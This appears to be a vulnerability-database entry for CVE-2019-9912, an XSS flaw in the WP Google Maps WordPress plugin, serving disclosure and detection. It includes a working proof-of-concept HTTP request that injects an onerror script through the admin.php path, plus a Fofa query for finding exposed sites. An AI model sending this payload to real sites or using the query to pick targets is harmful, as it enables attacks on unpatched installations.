🔙 목록으로 돌아가기

CVE-2019-9912: WP Google Maps < 7.10.43 - Cross-Site Scripting

TitleWP Google Maps < 7.10.43 - Cross-Site Scripting
Authorritikchaddha
SeverityMedium
ImpactAttackers can execute arbitrary scripts in the admin context, potentially leading to session hijacking or privilege escalation.
RemediationUpdate to version 7.10.43 or later.
CVSS Score6.1
EPSS Score0.00387
CVE IDCVE-2019-9912
CWE IDCWE-79
Fofa Querybody="/wp-content/plugins/wp-google-maps"
Tags cve cve2019 wp wp-plugin wordpress xss wp-go-maps vuln

🔍 Vulnerability Description

The wp-google-maps plugin before 7.10.43 for WordPress has XSS via the wp-admin/admin.php PATH_INFO.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-admin/admin.php/%27%22%3E%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E?page=wp-google-maps-menu&action=foo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9912.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9912.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A